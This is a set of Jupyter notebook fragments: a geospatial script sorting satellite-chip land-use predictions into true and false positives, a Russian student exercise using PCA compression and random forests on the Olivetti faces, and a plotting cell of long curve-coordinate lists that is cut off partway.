's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_800_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_900_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_900_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_900_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_900_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/87/87_0_100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/87/87_0_200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/87/87_100_0.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/87/87_100_100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/87/87_100_200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/87/87_200_100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/87/87_200_200.tif']) len(data["87"]) len(data2["87"]) ``` 52 1034 52 377 92 4543 92 451 87 41 87 7 ``` for key in data2.keys(): for polygon in data2[key]: data[key].append(polygon) data.keys() for key in data2.keys(): print(key,len(data[key])) print(key,len(data2[key])) # for polygon in data2[key]: # data[key].append(polygon) data.keys() def output_for_gdf(data,label_match="ISL"): count = {} label_match_results = [] granule_count = len(data.keys()) granule_list = data.keys() count["granule_count"] = granule_count for k1 in list(data.keys()): for i in range(len(data[k1])): if len(data[k1][i]['predicted_labels']) == 0: if "null_chips" not in count.keys(): count["null_chips"] = 1 else: count["null_chips"] += 1 for label in data[k1][i]['predicted_labels']: if label == label_match: label_match_results.append([k1,data[k1][i]]) return label_match_results data_for_gdf = output_for_gdf(data) data_for_gdf[0][1]["actual_label"] predicted_labels = [] actual_labels = [] polygon_list = [] for result in data_for_gdf: predicted_labels.append(result[1]["predicted_labels"][0]) actual_labels.append(result[1]["actual_label"]) coords = result[1]["polygon_coords"] polygon = Polygon(coords) polygon_list.append(polygon) gdf = gpd.GeoDataFrame({"predicted_label":predicted_labels,"actual_label":actual_labels,"geometry":polygon_list}) gdf.shape false_positive_gdf = gpd.GeoDataFrame(gdf[gdf["predicted_label"] != gdf["actual_label"] ]["geometry"]).reset_index(drop=True) true_positive_gdf = gpd.GeoDataFrame(gdf[gdf["predicted_label"] == gdf["actual_label"] ]["geometry"]).reset_index(drop=True) false_positive_gdf.shape true_positive_gdf.shape def convert_to_4326(gdf): gdf = gdf.set_crs(epsg=3257) gdf = gdf.to_crs(epsg=4326) return gdf false_positive_gdf = convert_to_4326(false_positive_gdf) true_positive_gdf = convert_to_4326(true_positive_gdf) false_positive_gdf true_positive_gdf true_positive_gdf.to_file("true_positive_ISL_labelled.geojson", driver="GeoJSON", index=True) false_positive_gdf.to_file("false_positive_ISL_labelled.geojson", driver="GeoJSON", index=True) ```
github_jupyter
# КТ-2, группа ПМ-1801 ## Кирилл Захаров ``` # ТЕМА. Сжание изображений. # Загрузить лица olivetti from sklearn.datasets import fetch_olivetti_faces from sklearn.datasets import load_sample_images from sklearn.decomposition import PCA from sklearn.model_selection import train_test_split from sklearn.ensemble import RandomForestClassifier from sklearn.metrics import classification_report, confusion_matrix import seaborn as sns import matplotlib.pyplot as plt %matplotlib inline import numpy as np # 400 x 4096 (40 лиц x 10 вариантов) х (64х64) dataset = fetch_olivetti_faces() len(dataset.images) dataset['data'].shape dataset['images'].shape dataset['target'].shape # Примените метод РСА для сжатия изображений, 3 варианта отбора количества компонент, # один из них - полный набор. ``` ### n_components = 400 ``` pca = PCA(n_components = 400) data_transformed = pca.fit_transform(dataset['data']) data_transformed.shape # Сформируйте случайным образом выборки train и test # Не забудьте про seed_random X_train, X_test, Y_train, Y_test = train_test_split(data_transformed, dataset['target'], random_state=5) # Для всех 3-х вариантов выполните классификацию (метод выберите сами). # Расчитайте метрики качества, # дополнительно - количество правильно распознанных изображений. # Сравните результаты: number of components, learning time, accuracy_score. rfc = RandomForestClassifier(n_estimators = 400, max_depth=5) rfc.fit(X_train, Y_train) prediction = rfc.predict(X_test) print(classification_report(Y_test, prediction, zero_division=0)) plt.subplots(figsize=(12, 12), dpi=120) sns.heatmap(confusion_matrix(Y_test, prediction), annot=True, square=True, cmap='mako') plt.show() indxs = np.random.randint(1, len(dataset['images']), 2) indxs plt.imshow(dataset['images'][indxs[0]]) plt.show() plt.imshow(data_transformed[indxs[0]].reshape(20,20)) plt.show() plt.imshow(dataset['images'][indxs[1]]) plt.show() plt.imshow(data_transformed[indxs[1]].reshape(20,20)) plt.show() ``` ### n_components = 100 ``` pca = PCA(n_components = 100) data_transformed = pca.fit_transform(dataset['data']) data_transformed.shape # Сформируйте случайным образом выборки train и test # Не забудьте про seed_random X_train, X_test, Y_train, Y_test = train_test_split(data_transformed, dataset['target'], random_state=5) # Для всех 3-х вариантов выполните классификацию (метод выберите сами). # Расчитайте метрики качества, # дополнительно - количество правильно распознанных изображений. # Сравните результаты: number of components, learning time, accuracy_score. rfc = RandomForestClassifier(n_estimators = 400, max_depth=5) rfc.fit(X_train, Y_train) prediction = rfc.predict(X_test) print(classification_report(Y_test, prediction, zero_division=0)) indxs = np.random.randint(1, len(dataset['images']), 2) indxs plt.imshow(dataset['images'][indxs[0]]) plt.show() plt.imshow(data_transformed[indxs[0]].reshape(10,10)) plt.show() plt.imshow(dataset['images'][indxs[1]]) plt.show() plt.imshow(data_transformed[indxs[1]].reshape(10,10)) plt.show() ``` ## без сжатия ``` X_train, X_test, Y_train, Y_test = train_test_split(dataset['data'], dataset['target'], random_state=5) rfc = RandomForestClassifier(n_estimators = 400, max_depth=5) rfc.fit(X_train, Y_train) prediction1 = rfc.predict(X_test) print(classification_report(Y_test, prediction1, zero_division=0)) ``` #### При сжатие точность класиификации составила 0.65, а без сжатия 0.63. Также при сжатии лучше макро-среднее по recall, что говорит о более точной классификации, то есть мы меньше ошибаемся в ошибках первого рода.
github_jupyter
``` import numpy as np import matplotlib import matplotlib.pyplot as plt # model 1 on suzhou and swiss x1, y1 = [0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.012605042016806723, 0.012605042016806723, 0.012605042016806723, 0.01680672268907563, 0.02100840336134454, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.029411764705882353, 0.037815126050420166, 0.037815126050420166, 0.037815126050420166, 0.037815126050420166, 0.04201680672268908, 0.046218487394957986, 0.046218487394957986, 0.0546218487394958, 0.0546218487394958, 0.058823529411764705, 0.058823529411764705, 0.06722689075630252, 0.07142857142857142, 0.07563025210084033, 0.07983193277310924, 0.08403361344537816, 0.09243697478991597, 0.10084033613445378, 0.10504201680672269, 0.10504201680672269, 0.1092436974789916, 0.1134453781512605, 0.11764705882352941, 0.11764705882352941, 0.12605042016806722, 0.13025210084033614, 0.13865546218487396, 0.14285714285714285, 0.14285714285714285, 0.14705882352941177, 0.14705882352941177, 0.15126050420168066, 0.15546218487394958, 0.15546218487394958, 0.1638655462184874, 0.1638655462184874, 0.1638655462184874, 0.1722689075630252, 0.18067226890756302, 0.19327731092436976, 0.20168067226890757, 0.20588235294117646, 0.21008403361344538, 0.2184873949579832, 0.22268907563025211, 0.22268907563025211, 0.23949579831932774, 0.25210084033613445, 0.2647058823529412, 0.2647058823529412, 0.2773109243697479, 0.2773109243697479, 0.2857142857142857, 0.28991596638655465, 0.29831932773109243, 0.3067226890756303, 0.31092436974789917, 0.31512605042016806, 0.31512605042016806, 0.31932773109243695, 0.31932773109243695, 0.3277310924369748, 0.3319327731092437, 0.33613445378151263, 0.3403361344537815, 0.35294117647058826, 0.36134453781512604, 0.36554621848739494, 0.3739495798319328, 0.37815126050420167, 0.37815126050420167, 0.37815126050420167, 0.38235294117647056, 0.38235294117647056, 0.3865546218487395, 0.3865546218487395, 0.3907563025210084, 0.3949579831932773, 0.3949579831932773, 0.39915966386554624, 0.40756302521008403, 0.41596638655462187, 0.42016806722689076, 0.42436974789915966, 0.42857142857142855, 0.4369747899159664, 0.44537815126050423, 0.453781512605042, 0.4579831932773109, 0.46218487394957986, 0.47478991596638653, 0.4789915966386555, 0.4957983193277311, 0.5084033613445378, 0.5168067226890757, 0.5210084033613446, 0.5252100840336135, 0.542016806722689, 0.5462184873949579, 0.5504201680672269, 0.5588235294117647, 0.5714285714285714, 0.5714285714285714, 0.5882352941176471, 0.5966386554621849, 0.6008403361344538, 0.6008403361344538, 0.6008403361344538, 0.6008403361344538, 0.6092436974789915, 0.6092436974789915, 0.6092436974789915, 0.6134453781512605, 0.6218487394957983, 0.6260504201680672, 0.6302521008403361, 0.6386554621848739, 0.6554621848739496, 0.6596638655462185, 0.6722689075630253, 0.6764705882352942, 0.680672268907563, 0.6890756302521008, 0.6890756302521008, 0.6932773109243697, 0.6974789915966386, 0.6974789915966386, 0.7058823529411765, 0.7100840336134454, 0.7226890756302521, 0.7310924369747899, 0.7352941176470589, 0.7394957983193278, 0.7394957983193278, 0.7521008403361344, 0.7521008403361344, 0.7563025210084033, 0.7605042016806722, 0.7647058823529411, 0.7773109243697479, 0.7815126050420168, 0.7857142857142857, 0.7899159663865546, 0.7983193277310925, 0.8067226890756303, 0.8067226890756303, 0.8067226890756303, 0.8109243697478992, 0.8235294117647058, 0.8361344537815126, 0.8403361344537815, 0.8445378151260504, 0.8487394957983193, 0.8529411764705882, 0.8571428571428571, 0.8697478991596639, 0.8697478991596639, 0.8697478991596639, 0.8739495798319328, 0.8781512605042017, 0.8823529411764706, 0.8865546218487395, 0.8949579831932774, 0.8949579831932774, 0.8991596638655462, 0.9033613445378151, 0.907563025210084, 0.9117647058823529, 0.9117647058823529, 0.9117647058823529, 0.9159663865546218, 0.9201680672268907, 0.9243697478991597, 0.9285714285714286, 0.9285714285714286, 0.9285714285714286, 0.9327731092436975, 0.9327731092436975, 0.9327731092436975, 0.9369747899159664, 0.9453781512605042, 0.9453781512605042, 0.9495798319327731, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.957983193277311, 0.957983193277311, 0.957983193277311, 0.957983193277311, 0.9621848739495799, 0.9621848739495799, 0.9621848739495799, 0.9663865546218487, 0.9747899159663865, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 1] , [0, 0.0, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.012605042016806723, 0.012605042016806723, 0.012605042016806723, 0.012605042016806723, 0.01680672268907563, 0.01680672268907563, 0.01680672268907563, 0.01680672268907563, 0.01680672268907563, 0.01680672268907563, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.029411764705882353, 0.029411764705882353, 0.029411764705882353, 0.029411764705882353, 0.03361344537815126, 0.03361344537815126, 0.03361344537815126, 0.03361344537815126, 0.03361344537815126, 0.03361344537815126, 0.03361344537815126, 0.037815126050420166, 0.037815126050420166, 0.04201680672268908, 0.046218487394957986, 0.046218487394957986, 0.046218487394957986, 0.0546218487394958, 0.0546218487394958, 0.0546218487394958, 0.0546218487394958, 0.0546218487394958, 0.058823529411764705, 0.058823529411764705, 0.058823529411764705, 0.06302521008403361, 0.06302521008403361, 0.06302521008403361, 0.06722689075630252, 0.06722689075630252, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07983193277310924, 0.07983193277310924, 0.08403361344537816, 0.09243697478991597, 0.09243697478991597, 0.09663865546218488, 0.09663865546218488, 0.09663865546218488, 0.09663865546218488, 0.10504201680672269, 0.11764705882352941, 0.11764705882352941, 0.13025210084033614, 0.13865546218487396, 0.13865546218487396, 0.14705882352941177, 0.15546218487394958, 0.1638655462184874, 0.1722689075630252, 0.18067226890756302, 0.18487394957983194, 0.18907563025210083, 0.21008403361344538, 0.2184873949579832, 0.2184873949579832, 0.23109243697478993, 0.23949579831932774, 0.24369747899159663, 0.25210084033613445, 0.25630252100840334, 0.2605042016806723, 0.2647058823529412, 0.2689075630252101, 0.2773109243697479, 0.2773109243697479, 0.2773109243697479, 0.2815126050420168, 0.28991596638655465, 0.28991596638655465, 0.28991596638655465, 0.29411764705882354, 0.3067226890756303, 0.3067226890756303, 0.3067226890756303, 0.31092436974789917, 0.31512605042016806, 0.31932773109243695, 0.3235294117647059, 0.3277310924369748, 0.3319327731092437, 0.33613445378151263, 0.3403361344537815, 0.3445378151260504, 0.3487394957983193, 0.35714285714285715, 0.36134453781512604, 0.36554621848739494, 0.3865546218487395, 0.3949579831932773, 0.40336134453781514, 0.40756302521008403, 0.40756302521008403, 0.41596638655462187, 0.41596638655462187, 0.41596638655462187, 0.42016806722689076, 0.4411764705882353, 0.44537815126050423, 0.4495798319327731, 0.453781512605042, 0.46218487394957986, 0.47478991596638653, 0.4831932773109244, 0.4957983193277311, 0.4957983193277311, 0.5, 0.5042016806722689, 0.5126050420168067, 0.5168067226890757, 0.5294117647058824, 0.5378151260504201, 0.5378151260504201, 0.5378151260504201, 0.5378151260504201, 0.5378151260504201, 0.5504201680672269, 0.5504201680672269, 0.5588235294117647, 0.5672268907563025, 0.5672268907563025, 0.5672268907563025, 0.5756302521008403, 0.5798319327731093, 0.5840336134453782, 0.592436974789916, 0.592436974789916, 0.592436974789916, 0.5966386554621849, 0.6008403361344538, 0.6092436974789915, 0.6176470588235294, 0.6176470588235294, 0.6176470588235294, 0.6260504201680672, 0.6260504201680672, 0.6260504201680672, 0.6302521008403361, 0.6428571428571429, 0.6470588235294118, 0.6512605042016807, 0.6596638655462185, 0.6638655462184874, 0.6680672268907563, 0.6722689075630253, 0.6764705882352942, 0.6890756302521008, 0.6890756302521008, 0.6932773109243697, 0.6932773109243697, 0.6974789915966386, 0.7058823529411765, 0.7100840336134454, 0.7100840336134454, 0.7184873949579832, 0.7226890756302521, 0.7226890756302521, 0.7226890756302521, 0.7226890756302521, 0.7310924369747899, 0.7310924369747899, 0.7394957983193278, 0.7436974789915967, 0.7436974789915967, 0.7436974789915967, 0.7436974789915967, 0.7436974789915967, 0.7521008403361344, 0.7605042016806722, 0.7647058823529411, 0.7689075630252101, 0.773109243697479, 0.773109243697479, 0.773109243697479, 0.773109243697479, 0.773109243697479, 0.7773109243697479, 0.7815126050420168, 0.7857142857142857, 0.7899159663865546, 0.7983193277310925, 0.7983193277310925, 0.7983193277310925, 0.8067226890756303, 0.8067226890756303, 0.8067226890756303, 0.8109243697478992, 0.8109243697478992, 0.819327731092437, 0.8277310924369747, 0.8361344537815126, 0.8361344537815126, 0.8403361344537815, 0.8487394957983193, 0.8529411764705882, 0.8529411764705882, 0.8613445378151261, 0.8613445378151261, 0.8613445378151261, 0.8613445378151261, 0.865546218487395, 0.865546218487395, 0.865546218487395, 0.865546218487395, 0.865546218487395, 0.865546218487395, 0.8739495798319328, 0.8781512605042017, 0.8823529411764706, 0.8823529411764706, 0.8823529411764706, 0.8823529411764706, 0.8823529411764706, 0.8991596638655462, 0.9033613445378151, 0.9033613445378151, 0.9033613445378151, 0.9117647058823529, 0.9117647058823529, 0.9159663865546218, 0.9159663865546218, 0.9201680672268907, 0.9243697478991597, 0.9285714285714286, 0.9327731092436975, 0.9327731092436975, 0.9327731092436975, 0.9327731092436975, 0.9411764705882353, 0.9411764705882353, 0.9411764705882353, 0.9411764705882353, 0.9411764705882353, 0.9411764705882353, 0.9411764705882353, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.957983193277311, 0.957983193277311, 0.9621848739495799, 0.9621848739495799, 0.9621848739495799, 0.9621848739495799, 0.9621848739495799, 0.9621848739495799, 0.9621848739495799, 0.9621848739495799, 0.9663865546218487, 0.9663865546218487, 0.9663865546218487, 0.9663865546218487, 0.9663865546218487, 0.9663865546218487, 0.9663865546218487, 0.9663865546218487, 0.9663865546218487, 0.9705882352941176, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 